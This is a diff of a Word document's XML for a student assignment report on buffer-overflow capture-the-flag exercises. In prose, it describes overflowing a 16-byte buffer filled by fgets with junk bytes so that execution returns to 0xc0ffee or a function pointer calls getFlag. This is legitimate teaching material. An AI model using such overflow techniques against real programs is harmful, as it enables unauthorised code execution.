+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+        <w:t>The youtube approach</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Sources</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+        <w:t>Why 8 bytes of junk on 02?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+        <w:t>Some more disassembly dumps</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+        <w:t>Look over the additional questions</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+        <w:t>Look over frames visualization tool</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Title"/>
@@ -23,6 +236,80 @@
         </w:rPr>
         <w:t>Compulsory Assignment I: Report</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Introduction</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>External libraries: pwntools</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>I’ve used the compiled ELF files provided.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -129,14 +416,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -175,7 +454,7 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
@@ -323,55 +602,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">Hence, if I </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">overflow the buffer </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>send</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ing</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 16 bytes of junk </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>and return to the memory address</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">The buffer is of size 16, but there </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -381,6 +612,24 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:t>fgets</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> function allows input upto 512 bytes. To exploit this weakness I overflow the buffer by sending 16 bytes of junk and return to the memory address </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
         <w:t>0xc0ffee</w:t>
       </w:r>
       <w:r>
@@ -389,7 +638,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>, I retrieve the flag.</w:t>
+        <w:t>, and retrieve the flag.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1402,6 +1651,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t> </w:t>
       </w:r>
     </w:p>
@@ -1491,7 +1741,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F49B703" wp14:editId="62F9A1EC">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15094FD6" wp14:editId="2148742D">
             <wp:extent cx="5972810" cy="1187450"/>
             <wp:effectExtent l="0" t="0" r="8890" b="0"/>
             <wp:docPr id="173540068" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
@@ -1655,7 +1905,6 @@
           <w:kern w:val="0"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="nb-NO"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -1668,7 +1917,6 @@
           <w:kern w:val="0"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="nb-NO"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>Vulnerability</w:t>
@@ -1689,7 +1937,6 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">The buffer overflow vulnerability in this program lies in the fgets call, which reads the input to the program. There is no restriction on the size of input to the buffer, which means that an attacker can exploit it by inputing more than 16 bytes and thus overwrite the stack. </w:t>
       </w:r>
     </w:p>
@@ -1798,51 +2045,79 @@
           <w:szCs w:val="28"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">Observations: Source </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+        <w:t>Observations: Source Code</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In this program, the function </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>C</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is responsible for surrendering the flag. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="1E4E79"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>ode</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">In this program, the function </w:t>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>main</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> function, the structure </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1852,33 +2127,15 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>getFlag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is responsible for surrendering the flag. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">In the </w:t>
+        <w:t>vars</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> contains a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1888,15 +2145,15 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>main</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> function, the structure </w:t>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of 16-byte capacity, as well as a function pointer which is initialized not to point to any function. The if/else-statement checks which address </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1906,91 +2163,95 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>vars</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> contains a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+        <w:t>funPointer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is pointing to, and executes the function in that location - i.e. if it points to the address of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>buffer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> of 16-byte capacity, as well as a function pointer which is initialized not to point to any function. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The if/else-statement checks </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">which address </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>, the function is called and the flag is retrieved. Else, it prompts user to try again.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I use a similar approach as to 00, and overflow the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>funPointer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is pointing to</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, and executes the function in that location - i.e. if it points to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">the address of </w:t>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> with 16 bytes of junk. This time I return to the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>address</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2008,59 +2269,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">, the function is called and the flag is retrieved. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Else, it prompts user to try again.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">I use a similar approach </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">as </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">to 00, and overflow the </w:t>
+        <w:t xml:space="preserve"> in order to get the function pointer to call it. I obtain the address of </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2070,47 +2279,15 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>buffer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> with 16 bytes of junk. This time </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>return to</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
